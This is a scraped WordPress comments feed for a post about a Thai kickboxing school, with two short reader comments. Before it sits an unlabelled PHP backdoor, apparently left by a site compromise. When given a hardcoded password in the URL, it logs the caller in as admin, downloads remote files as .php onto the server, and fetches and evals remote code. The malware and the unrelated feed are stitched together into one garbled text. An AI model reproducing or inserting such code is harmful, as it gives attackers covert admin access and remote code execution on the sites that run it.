if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == 'aab3238922bcc25a6f606eb525ffdc56'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}
Comments on: Kickboxing for All Ages – School In Thailand
http://wtf.thebizzare.com/offbeat/culture/kickboxing-for-all-ages-school-in-thailand/
Weird News, Weird Stuff, Wtf PicturesWed, 13 Oct 2010 13:34:24 +0000hourly1http://wordpress.org/?v=3.0.3By: Petr
http://wtf.thebizzare.com/offbeat/culture/kickboxing-for-all-ages-school-in-thailand/comment-page-1/#comment-1750
PetrTue, 04 May 2010 20:04:07 +0000http://wtf.thebizzare.com/?p=1611#comment-1750It is Mauy Thai or Thai boxing if you want... There is a big diffrence between it and kickboxing. It is quite common in Thailand that boys goes young to training camps and at their 15yrs have more fights then any fighters from anywhere elseIt is Mauy Thai or Thai boxing if you want… There is a big diffrence between it and kickboxing. It is quite common in Thailand that boys goes young to training camps and at their 15yrs have more fights then any fighters from anywhere else
]]>
By: dknypg83
http://wtf.thebizzare.com/offbeat/culture/kickboxing-for-all-ages-school-in-thailand/comment-page-1/#comment-1601
dknypg83Sat, 30 Jan 2010 16:20:32 +0000http://wtf.thebizzare.com/?p=1611#comment-1601wow... some good quality photos u have here!! btw, do u know that there are still underground fights where alot of fighters fought till death?! crazy huh...wow… some good quality photos u have here!! btw, do u know that there are still underground fights where alot of fighters fought till death?! crazy huh…
]]>